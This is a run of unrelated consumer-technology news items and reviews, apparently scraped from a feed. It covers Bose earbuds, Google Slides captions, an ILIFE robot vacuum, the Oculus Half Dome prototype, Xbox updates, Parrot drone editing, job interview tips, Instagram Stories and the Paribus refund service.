Bose says these next-gen buds are about a third smaller than the previous version, which will be a welcome change. The first QuietComfort Earbuds were plenty big, so anything the company can do to trim the overall size will be an improvement. Bose explains that it has also changed the fit of the earbuds with what it calls a Fit Kit. Essentially, the ear tip is now two pieces, with an oval-shaped tip and a “stability band” that keeps the buds secure in your ears. There are three sizes of each, so you can mix and match bases on what works best for you. What’s more, the Bose app offers a fit test that checks for an adequate seal by detecting any leaks.
Inside, the QuietComfort Earbuds II are equipped with what Bose calls CustomTune sound calibration. The technology has been available on the company’s SoundControl hearing aids, but in this case it’s used to improve a bunch of core earbud features. By measuring the acoustic properties of your ear canal, Bose says CustomTune tailors both the audio and the active noise cancellation (ANC) to you. The process takes less than half a second and is completed every time you put the earbuds in your ears. The company further explains that CustomTune “fully optimizes the sound frequency profile to the unique properties of every ear, so the sound that reaches the eardrum is just as the artist intended.” For ANC, CustomTune calibrates the noise reduction signal and Bose says its noise-canceling tech is better at blocking human voices and crying babies. Plus, the ANC is continuously adapting to any changes, keeping distractions to a minimum.

CustomTune is also applied to ambient sound on the QuietComfort Earbuds II. When you’re using that transparency or Aware Mode, a feature called ActiveSense can pick up any loud noise and apply the appropriate level of cancellation until it stops. Bose says CustomTune also helps the QC Earbuds II offer an ambient sound that’s “as natural and lifelike as possible.”
The QuietComfort Earbuds II are IPX4 rated for sweat and water resistance, so you should be able to use them during workouts with no problem. Bose says it also improved call quality thanks to changes to the noise removal algorithm. And lastly, you can expect up to six hours of battery life with three more charges in the case. A quick-charge feature will give you two hours of use in 20 minutes.
The QuietComfort Earbuds II will be available on September 15th for $ 299, but you can pre-order them now. Only the black color option will ship on that date, but Bose is planning to sell a “Soapstone” version later this year.

If you want to caption a presentation for people who are deaf or hard of hearing, you typically have to do it yourself. Google might just save you that trouble — it’s launching an automatic closed captioning feature for Slides. Plug a microphone into your computer, hit a “CC” button and Slides will automatically caption your speech as you walk through the presentation. As the captions arrive in real-time, you don’t have to worry about stopping on each slide to give your audience a chance to read.
The project was prompted by an internal hackathon where accessibility engineers Laura D’Aquila and Abigail Klein noticed that it was difficult for the hearing impaired to follow some presentations.
Automatic captioning will be available in Slides this week for users around the world in US English. While it’s unclear how accurate the system will be in practice (YouTube’s live captions aren’t always on the mark), it should be a vital tool for making presentations more accessible. Google adds that it could even be helpful for people without hearing issues, since you could hold a presentation in a noisy hall without having to shout.

I live in a home with two shedding cats, a dog that sheds even more, two free-range boys, and an incredibly busy wife. We clearly must stay on top of cleaning or we end up with dust bunnies drifting across our hardwood floors like tumbleweed in the Wild West. It was clear that we needed a robotic vacuum.
Robotic vacuum cleaners, or robovacs, are rechargeable battery-powered appliances that use a combination of suction and brushes to clean your floor. You are probably familiar with the most popular brand, iRobot’s Roomba. Most models, including the Roomba and ILIFE’s robovacs, are circular and look like giant beetles rolling across your floor. You can control them with a remote control, or they operate autonomously using intelligent programming.
In March, ILIFE introduced their newest robotic vacuum cleaner: the V8s. Their representative sent me the unit to test in our home that was deep in the throes of a renovation project. Below, I will share some info about the ILIFE V8s, how it handled the fur and dust of our house, and if it’s worth your money.
Based in Shenzhen, China, where many of their models are also manufactured, ILIFE launched an intelligent robotic vacuum project in 2010. The company’s only focus is on producing innovative robovacs. They were the first to integrate infrared detection systems, lithium-ion batteries, and BLOC fan motors. Today, they have warehouses and service centers on four continents.
The ILIFE V8s robotic vacuum cleaner was launched in March of 2018. It is part of the company’s V series of robovacs, which are designed for vacuuming and mopping hard floors. The V8s is considered the most advanced model in the V series. It’s unique because it features a relatively large 750-milliliter dustbin, high-suction setting, and i-Dropping mopping. The mopping system is designed to limit the amount of water that is dispersed to avoid damaging cables or flooring. The vacuum is also able to perform edge, spot, and programmed cleaning.
Since I had never used a robotic vacuum before, I was a little intimidated at first. I opened the box, saw an array of confusing attachments, closed the box, and basically ran away. But, after a couple days of neglect, the pet hair started to pile up and my wife gently encouraged me to read the manual. Looking back, I don’t know what I was so afraid of.
I spent about 10 minutes reading the manual and quickly felt comfortable setting up the vacuum and the charging dock. The manual recommends charging the vacuum for at least 12 hours before using it for the first time. Also, the charging dock needs to be against a wall with three feet of clearance on the sides and six feet of clearance directly in front of it. This is meant to make it easier for the vacuum to leave and dock. In practice, I found the little guy — we named him “Jerome 2.0” after my teen son who no longer needed to do the vacuuming — didn’t need that much space.
Once the robot was charged, I realized I needed to preclean. It was nothing major: I just needed to pick some items up off the floor. I figured the vac would get caught up on the Lego detritus that tends to show up when you have a young child. And, shoelaces and random cords could also tie up the brushes. The precleaning forced me to be a tidier person. I would still miss the occasional phone charger wire hanging loose, but if the V8s got to it before me, it would just send out a little beeping cry for help, and I would set it free.

On its maiden voyage, the V8s ran for about an hour and a half on normal suction mode. Subsequently, I noticed the vacuum would run for up to two hours on normal power and about an hour on high suction. After each semi-daily cycle, the dustbin would be full.
I quickly learned that I could not operate the robovac around my four-year-old son. No matter how I tried to tell him that he needed to observe from a distance, he would test out the abilities of the vacuum. He laid out bits of paper and other debris for the device to “eat.” I thought I had turned a corner when I handed him the remote, which gave him complete control over the robot’s motions, but he was soon back to lifting the robovac up or pushing it around.
Because of this human obstacle, I chose to run the vacuum when my preschooler was preoccupied. As my comfort levels increased, I programmed it to run every afternoon at 2:30 p.m. since this was when the little one was either napping or pretending to nap.
The mopping function was another feature seemed challenging but turned out to be super simple. First, you remove the dustbin attachment, fill the water tank with warm water, make sure the mop cloth is attached (the system comes with two clothes), insert the mopping attachment, and press start. In mop mode, drops of water are released as the robot covers a seven-meter-by-seven-meter area directly in front of its starting position.
It’s important to vacuum before you mop. Unfortunately, if you run the battery down, you need to let the device charge before you can mop. I found the V8s charges quickly, usually about four hours to go from zero bars to three bars – the highest charge level. And, the mopping function doesn’t need nearly as much battery power as the vacuum.
Another feature worth noting is the “RoadRover” wheels. The V8s has two substantial wheels that can handle uneven floors and lift the vacuum over thresholds. Our house’s foundation has settled a bit over the years causing some dramatic lips from one room to the next. The V8s was able to handle these to my satisfaction, but I would not say it was seamless.
As with any vacuum, there is a little maintenance involved with operating a V8s. The dustbin should be emptied after each use. This was effortless: You just open the magnetic door and shake the contents into your trash can. ILIFE recommends cleaning the filter, spinning side brushes, and charging dock each week. Over the last two months, I was lax in performing these duties and didn’t notice any degradation in performance.
For the most part, I was happy with the V8s. If a ne’er-do-well were to break into my home and take it, I would likely replace it. However, there were a few things that were mildly annoying. First, the vacuum kept getting caught in the hair of my elderly Nova Scotia Duck Tolling Retriever. He didn’t care enough to get out of its way, so the brush would just keep winding up his fur until it registered an error. I would then have to free the vacuum and direct it elsewhere.
Programming the vacuum to clean on a schedule could be more user-friendly. If you happen to hit the power button on the vacuum, which is easy to do by accident, the schedule is erased. To set the times, you will need guidance from the user manual since it isn’t intuitive. This whole process could be improved with a smartphone app, which ILIFE offers with other models. Unfortunately, the V8s doesn’t get the app treatment.
Lastly, the V8s is not designed for deep cleaning. It’s more of a maintenance device, which is perfect for taking care of dust and pet hair. But, if you have a wee one who drops and stomps on a blueberry, you’ll probably want to use a wet paper towel instead of summoning the V8s’s mop, which could potentially spread the mess around.
Overall, I’m surprised more people don’t invest in robotic vacuums, especially if you have pets (though you might want to be careful if your pet has incontinence problems.) The ILIFE V8s Robotic Mop & Vacuum Cleaner is a particularly attractive option because it forgoes smart connectivity in favor of a lower price and simple functionality. So, for around $260, you get many of the cleaning features you might expect from pricier Roombas.

Enlarge / Oculus’s latest headset prototype, the Half Dome, as revealed at the F8 Developer Conference. (credit: Facebook / Oculus)
Oculus is only one day into the launch of a new, $ 199 VR headset, but the company has already begun hinting at the future of its higher-end line of Rift products. Wednesday saw Oculus reveal three interesting new developments for the company’s possible next headset—and the company gave us a visual hint at what it may look like, in the form of a new “Half Dome” prototype.
Half Dome, as shown at the F8 Developer Conference stage on Wednesday, looks almost identical to the existing Oculus Rift, with more noticeable bumps (likely for the sake of positional tracking, but not confirmed). The new stuff is all on the inside, and the most intriguing feature has never been demonstrated in a commercial headset before: a mechanical assembly that quickly moves lenses closer to and farther from a user’s face while they’re using a VR app.

Many TVs have a game mode that disables image processing to reduce lag, but it can be a pain if you regularly do things besides gaming. Do really want to switch the mode off every time you want to watch Netflix? You might not have to before long. Microsoft has unveiled a bevy of upcoming Xbox One updates that include support for Auto Low Latency Mode. If you have a compatible TV (some Samsung models will qualify), it’ll recognize your Xbox and invoke its low-lag mode only when you’re actually playing — all your TV’s processing will come back the moment you curl up with a movie. The improvement arrives later in 2018.
Another improvement will enable variable refresh rates for Xbox One S and One X systems hooked up to PC monitors that support AMD Freesync, in case you’re the sort to play at your desk instead of the living room. You can also expect the Edge browser to support downloads and uploads (say, a picture you want to use as your Xbox’s wallpaper) and Twitter sharing that displays media in-line. And as the company hinted at earlier in March, you can soon share your game controller with viewers when you’re livestreaming on Mixer. These updates should be ready later in the spring.

Drone videos can be spectacular, but editing them? Not so much — don’t be surprised if you spend hours cutting 10 minutes of footage into something worth watching. Parrot thinks there’s a better way. It’s adding a Flight Director feature to its FreeFlight Pro mobile app (for Android and iOS) that automatically edits your drone footage. Algorithms study the drone’s behavior and produce videos up to 3 minutes in length based on a handful of criteria, including the style (chronological, cinematic or trailer), pre-made themes and other existing footage. The biggest dilemma may be choosing your soundtrack.
Be prepared to pay up to get the full experience. You can create 15-second “best of” clips for free, but you’ll need to spring for the premium version of the feature in-app if you want to unlock its full potential. And of course, you’ll need a Parrot drone (a Bebop 1, 2 or Power) for this to work — you can get similar apps from the likes of GoPro, but it won’t be the exact same experience. If you have the hardware and regularly record aerial videos, though, this could let you spend more time flying and less time trimming clips.

• Some job interview errors are a bigger deal than others.
• Do your research and adopt a confident mindset in order to boost your chances of succeeding.
• But, whatever you do, don’t make mistakes like cursing, dissing the company, and asking weird personal questions.
Nobody’s perfect. You could be pro at job interviews, but there’s always a chance you’ll say something a bit off.
That won’t necessarily sink your candidacy, though. Your qualifications and endearing personality might just carry you over.
That is, unless you say something so bad that you completely wreck your chances.
Here are a few interview faux pas that could automatically disqualify you, unless you’re really lucky:

Questions like this will make you look like you don’t even care enough to run a simple Google search.

Never ask the interviewer any personal questions — or anything that could be offensive. It’s just off-putting.

Hey, everyone curses. It’s better to hold off on the profanities in job interviews, though. That being said, letting out a curse word or two during a funny story might not be a nail in your coffin. Angrily swearing at someone (your interviewer or otherwise), on the other hand, would definitely knock you out of the running. This goes double for any offensive, racist, or sexist speech.

Last week, The Next Web reported on a bunch of new features Instagram was reportedly testing out and today, the platform is giving users two new ways to manage Stories. The first is the rumored Story archive. Now, Instagram will automatically save your Stories after their 24 hours are up and they’ll exist in a separate archive section of your profile. You’ll be able to rewatch Stories, add them to posts or add them to a new Story. And if you decide you don’t want those Stories sticking around, you can turn off auto-archiving whenever you want.

Your archived Stories can also be used in the second new addition to Instagram. Underneath the bio in your profile, there will now be a section called Stories Highlights. They’re collections of previously shared Stories that will stay posted to your profile for as long as you want them there and you can have as many of them as you want. To make one, tap the “New” circle underneath your bio and select any stories you want to add from your new archive. You’ll then pick a cover image and name the Highlight and then it’s there for any of your followers to see at any time. To edit or delete them, just tap and hold.
Both features are rolling out now.

]]>Imagine getting an automatic refund on things you already own. For instance, you got a coffee maker for $ 70, and you really love it, but since then the in-store price has dropped to $ 50, so the powers-that-be have gone ahead and sent $ 20 back into your bank account.
You still have a coffee maker that you love (that you were willing to spend $ 70 on), but now it just got $ 20 cheaper, and without any effort at all on your part.
That would be how easy “price matching” would be if the process was seamless. It’s also how price matching is in reality if you use Paribus, a great — and totally free — tool that tracks your purchases and facilitates refunds on your behalf when there’s a price drop at a participating retailer.
While most stores offer price matching (and many of the big retailers Americans shop at are included in this), far fewer of us want to commit to tracking our purchases to see which ones are eligible for money back. And because no store is going to alert you to say they might owe you money for something you already bought, it is a process that requires vigilance and dedication on your part. (You might have to regularly check in on prices and then call customer service and listen to tinny classical music for a while). For the chance at a few dollars back, this normally is not worth the trouble. Since it requires so much active engagement from you for money that you already spent (and is already “lost” to you now), almost no one takes advantage of such a common, ridiculously nice retail perk, even though those few dollars back on every purchase would eventually amount to enough money to matter.
Paribus removes all of these roadblocks to claiming eligible refunds by doing all of the legwork for you.
Simply sign up online, or download the free app, and link your email by signing in through your email provider and clicking “yes” to grant the tool access to your emails. After that, Paribus will track the purchases you make to see if any of them experience a price drop at participating merchants. For instance, if the coffee maker drops from $ 70 to $ 50, Paribus will detect it, contact their customer service to facilitate a refund on your behalf, and then automatically send you the difference. You can also link your Amazon account too if you like — while they don’t participate in price drop refunds, you might be eligible for compensation if an order arrives late.
By virtue of working off of your emails, you’ll have to be comfortable sacrificing some privacy, but if the convenience is worth that to you, then you’ll be happy with how Paribus performs. The online interface is easy to use, and you’ll be able to find all the things you’ve bought and which Paribus is tracking in the “My Purchases” section of your dashboard.
While the service used to take a percentage of refunds, it is now completely, 100% free. You shop as usual, they check for price drops or late deliveries, and they’ll get you 100% of the difference back. Not to mention that the constant stream of price drops shown and notifications about “this week’s top save” and otherwise can help you find deals without even searching.
Though Paribus is a valuable financial tool at any time, it’s particularly primed to be helpful during the holiday season. You’ll likely be spending more than normal on gifts, and you’ll also likely have less time to price match. On top of that, many popular items see drastic price fluctuation, particularly once the big shopping craze dies down and discounts start rolling in to help attract shoppers post-holidays.
If getting money back on things you already bought (without any heavy lifting or really any interaction on your part at all) sounds good, you might want to give Paribus a try.
